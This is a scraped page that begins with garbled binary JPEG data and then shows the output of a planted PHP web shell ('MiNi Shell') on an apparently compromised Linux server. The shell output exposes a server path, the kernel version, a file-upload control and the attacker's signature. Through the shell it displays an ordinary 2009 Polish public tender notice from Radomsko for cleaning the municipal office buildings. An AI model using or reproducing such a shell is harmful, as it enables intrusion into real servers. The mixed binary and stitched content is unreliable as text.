JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090114/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20090114/4584-N-2009.html

<p class="kh_header"><b>Radomsko: Kompleksowe utrzymanie czystości w budynkach Urzędu Miasta Radomska przy ul. Tysiąclecia 5 oraz                   w siedzibie Urzędu Stanu Cywilnego  przy ul. Narutowicza 1 w Radomsku</b><br>
<b>Numer ogłoszenia: 4584 - 2009; data zamieszczenia: 14.01.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Miasto Radomsko , ul. Tysiąclecia 5, 97-500 Radomsko, woj. łódzkie, tel. 044 6854571, faks 044 6854513, 6854521.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.radomsko.pl, www.bip.radomsko.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Kompleksowe utrzymanie czystości w budynkach Urzędu Miasta Radomska przy ul. Tysiąclecia 5 oraz                   w siedzibie Urzędu Stanu Cywilnego  przy ul. Narutowicza 1 w Radomsku.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Kompleksowe utrzymanie czystości w budynkach Urzędu Miasta Radomska przy ul. Tysiąclecia 5 oraz                       w siedzibie Urzędu Stanu Cywilnego  przy ul. Narutowicza 1 w Radomsku.

  Zakres czynności obejmuje:
   -   codzienne  przecieranie  z  kurzu  podłóg  twardych  (parkiet,  panele,  wykładzina PCV, itp)                      w  pomieszczeniach  biurowych  i  salach  konferencyjnych  na  mokro  przy  użyciu środków  konserwujących,
   -   codzienne  odkurzanie  wykładzin  dywanowych  odkurzaczem,
   -   codzienne  sprzątanie  schodów  i  podłóg  kamiennych  w  holach  i  korytarzach - na mokro                        z  użyciem  środków  antypoślizgowych,
   -  czyszczenie  kamienia  i  powlekanie  specjalistycznym  środkiem  konserwującym  antypoślizgowym  do  powierzchni  kamiennych  ciągów  komunikacyjnych  ( dwa  razy  w  roku),
  - czyszczenie  i  powlekanie  specjalistycznym  środkiem  konserwującym antypoślizgowym                          do  powierzchni  PCV  podłogi  w  sali  obrad  (dwa  razy  w  roku),  
  -   codzienne  wycieranie  kurzu  z  mebli,  parapetów,  telefonów  itp.,
  -   codzienne  opróżnianie  koszy  na  śmieci,
  -   utrzymanie  w  czystości  stolarki  drzwiowej,
  -   codzienne  sprzątanie  pomieszczeń  sanitarnych  z  użyciem  środków  odkażających,
  -  pranie wykładzin dywanowych, pranie firan (w zależności od potrzeb zgłaszanych przez  Zamawiającego,  nie  rzadziej  niż  1  raz  w  roku),
  -  bieżąca  pielęgnacja roślin  w salach konferencyjnych i na korytarzach,
         -  mycie okien  i  elewacji  szklanych  (dwa  razy  do  roku),
         -  bieżące  mycie  naczyń  w  sekretariatach,  salach  konferencyjnych,
          - mycie  ściany  z tynkiem  strukturalnym  w  holu  budynku  Urzędu  Miasta, ul. Tysiąclecia 5 (1 raz               w  roku).       

Wyżej wymienione czynności wykonywane będą przez Wykonawcę przy użyciu własnego sprzętu i właściwej jakości środków chemicznych.

Obiekty objęte kompleksowym utrzymaniem czystości:

  1)  Budynek Urzędu Miasta Radomska 
       oraz budynek  Miejskiego Inspektoratu Obrony Cywilnej.
        97-500 Radomsko, ul. Tysiąclecia 5
        Pomieszczenia biurowe -  1548 m2 + ciągi komunikacyjne ( korytarze i kl. schodowa).

   2)  Siedziba Urzędu Stanu Cywilnego
        97-500 Radomsko ul. Narutowicza 1
        Pomieszczenia biurowe -  267 m2 + ciągi komunikacyjne (korytarze i kl. schodowa).

Do obowiązków Wykonawcy należało będzie również:
1)  ciągłe zapewnianie środków czystości i higieny w toaletach, takich jak:
-	mydła w płynie,
-	papier toaletowy miękki,
-	odświeżacze powietrza,
-	kostki zapachowe,
-	worki na śmieci (również w pomieszczeniach biurowych). 
2)   zapewnienie szczotki do mycia muszli klozetowej w każdej toalecie,
3)  zapewnienie bieżącego utrzymania czystości w godzinach pracy Urzędu Miasta, ul. Tysiąclecia 5 poprzez stały dyżur jednej sprzątaczki (od godz. 1000  do  1400).</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 90.91.00.00-9.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.01.2010.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> I. O udzielenie zamówienia może ubiegać się Wykonawca, który:
1)	posiada uprawnienia do wykonywania określonej działalności lub czynności, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień; 
2)	posiada niezbędną wiedzę i doświadczenie do wykonania zamówienia, tj. wykonał a w przypadku świadczeń okresowych lub ciągłych również wykonuje usługi w okresie ostatnich trzech lat przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, co najmniej jedną, trwającą nieprzerwanie co najmniej 11 miesięcy w ramach jednego kontraktu, usługę sprzątania pomieszczeń w obiektach użyteczności publicznej o łącznej powierzchni do sprzątania przekraczającej 1000 m2;
Przez budynki użyteczności publicznej należy rozumieć budynki przeznaczone na potrzeby administracji publicznej, wymiaru sprawiedliwości, kultury, kultu religijnego, oświaty, szkolnictwa wyższego, nauki, opieki zdrowotnej, opieki społecznej i socjalnej, obsługi bankowej, handlu, gastronomi, usług, turystyki, sportu, obsługi pasażerów w transporcie kolejowym, drogowym, lotniczym, morskim lub wodnym śródlądowym, świadczenia usług pocztowych lub telekomunikacyjnych oraz inny ogólnodostępny budynek przeznaczony do wykonywania podobnych funkcji, w tym także budynek biurowy i socjalny. 
3)	dysponuje potencjałem technicznym i osobami zdolnymi do wykonania zamówienia,  lub przedstawi pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia;
4)	znajduje się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia ; tj. jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności gospodarczej na sumę ubezpieczenia nie niższą niż 100.000,00 PLN (słownie: sto tysięcy złotych);
5)	nie podlega wykluczeniu z postępowania o udzielenie zamówienia.
II. Opis sposobu dokonywania oceny spełniania warunków udziału w postępowaniu:
Złożenie przez Wykonawcę w ofercie dokumentów i oświadczeń wymienionych w Sekcji III.2) pkt III.1. niniejszego ogłoszenia będzie stanowiło podstawę do oceny spełnienia warunków udziału w postępowaniu. Zamawiający sprawdzi              z  treści tych dokumentów i oświadczeń czy Wykonawca spełnia wszystkie w/w warunki.

Uwaga: 
Zmawiający wykluczy z postępowania Wykonawcę, który nie spełnia wymaganych warunków oraz jeżeli stwierdzi, że złożone przez niego informacje mające wpływ na wynik prowadzonego postępowania są nieprawdziwe..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> III. Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu (jeżeli dotyczy):

III.1. Oświadczenia oraz dokumenty potwierdzające spełnianie warunków, o których mowa w Sekcji III.2 pkt I:
1)	oświadczenie o spełnieniu warunków udziału w postępowaniu określonych w art. 22 ust. 1 ustawy - z wykorzystaniem wzoru określonego w dodatku nr 2 do SIWZ;
2)	oświadczenie, że oferowane usługi odpowiadają wymaganiom określonym przez zamawiającego - z wykorzystaniem wzoru określonego w dodatku nr 3 do SIWZ;
3)	aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert; 
4)	aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że wykonawca uzyskał przewidziane prawem zwolnienie, odroczenie  lub rozłożenie na raty zaległych płatności, lub wstrzymanie w całości wykonania decyzji właściwego organu podatkowego, wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania ofert; 
5)	aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające odpowiednio, że wykonawca nie zalega z opłacaniem opłat oraz składek na ubezpieczenie zdrowotne i społeczne, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania ofert;
6)	wykaz wykonanych a w przypadku świadczeń okresowych lub ciągłych również  wykonywanych usług w okresie ostatnich trzech lat przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, odpowiadających swoim rodzajem i wartością usługom      stanowiącym przedmiot zamówienia, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączenia dokumentów potwierdzających, że te usługi  zostały wykonane należycie (np. referencje). 
7)	polisa a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony                                 od odpowiedzialności cywilnej w zakresie prowadzonej działalności gospodarczej na sumę ubezpieczenia nie niższą niż 100.000,00 PLN.
III.2 Oferta wspólna
Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia (w ramach oferty wspólnej w rozumieniu art. 23 ustawy) pod warunkiem, że taka oferta spełniać będzie następujące wymagania:
1)	Wykonawcy występujący wspólnie są zobowiązani do ustanowienia Pełnomocnika do reprezentowania                ich w postępowaniu o udzielenie zamówienia albo reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego;
2)	Oryginał pełnomocnictwa lub kopia poświadczona za zgodność z oryginałem przez notariusza powinien              być załączony do oferty i zawierać w szczególności wskazanie:
a.	postępowania o zamówienie publiczne, którego dotyczy;
b.	wszystkich wykonawców ubiegających się wspólnie o udzielenie zamówienia wymienionych z nazwy           z określeniem adresu siedziby;
c.	ustanowionego Pełnomocnika oraz zakres jego umocowania;
3)	Dokument pełnomocnictwa musi być podpisany przez wszystkich Wykonawców ubiegających się wspólnie                  o udzielenie zamówienia. Podpisy muszą być złożone przez osoby uprawnione do składania oświadczeń woli wymienione we właściwym rejestrze lub ewidencji Wykonawców.
4)	Dokumenty, o których mowa w Sekcji III.2) pkt III.1. ppkt 3,4,5 musi złożyć osobno każdy z Wykonawców składających ofertę wspólną;
5)	W odniesieniu do warunków określonych w art. 22 ust. 1 pkt 2 i 3 ustawy, a w szczególności w Sekcji III.2)               pkt III.1. ppkt 6,7 wymagania te muszą być spełnione wspólnie przez wykonawców składających ofertę wspólną  (nie musi ich spełniać każdy z wykonawców składających ofertę wspólną osobno).
6)	 Oświadczenia, formularze, dokumenty sporządzone na załączonych do SIWZ wzorach, składa i podpisuje                   w imieniu wszystkich Wykonawców, Pełnomocnik wpisując w miejscu przeznaczonym na podanie nazwy                i adresu Wykonawcy, nazwy i adresy wszystkich Wykonawców składających ofertę wspólną;
7)	Wszystkie kserokopie dokumentów załączone do oferty muszą być opisane za zgodność z oryginałem             i podpisane przez Pełnomocnika;
8)	Wszelka korespondencja prowadzona będzie przez Zamawiającego wyłącznie z Pełnomocnikiem, którego adres należy wpisać w formularzu ofertowym.
9)	Jeżeli oferta Wykonawców występujących wspólnie zostanie wybrana, Zamawiający zażąda przed zawarciem umowy w sprawie zamówienia publicznego, umowy regulującej współpracę tych Wykonawców. 
III.3  Wykonawca zamieszkały poza terytorium Rzeczypospolitej Polskiej
III.3.1 Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, zamiast dokumentów, o których mowa w Sekcji III.2) pkt III.1. ppkt 3,4,5- składa dokument lub dokumenty, wystawione w kraju, w którym ma siedzibę lub miejsce zamieszkania, potwierdzające odpowiednio, że:
a)	nie otwarto jego likwidacji ani nie ogłoszono upadłości,
b)	nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo,              że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu.
III.3.2  Dokumenty, o których  mowa w Sekcji III.2) pkt III.3.1. lit. a, powinny być wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert. Dokument, o którym mowa w Sekcji III.2) pkt III.3.1. lit. b powinien być wystawiony  nie wcześniej niż 3 miesiące przed upływem terminu składania ofert.
III.3.3  Jeżeli w kraju pochodzenia osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania,                nie wydaje się dokumentów, o których mowa w Sekcji III.2) pkt III.3.1, zastępuje się je dokumentem zawierającym oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio kraju pochodzenia osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania. Postanowienia Sekcji III.2) pkt III.3.2 stosuje się odpowiednio..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.radomsko.pl, www.bip.radomsko.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miasta Radomska Biuro Zamówień Publicznych. 
Przekazanie SIWZ jest bezpłatne.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 26.01.2009 godzina 09:00, miejsce: Biuro Obsługi Obywatela -Biuro Podawcze w Urzędzie Miasta Radomska - parter budynku, 97-500 Radomsko ul. Tysiąclecia 5.</p><p><b>IV.3.5) Termin związania ofertą:</b> do 23.02.2009.</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com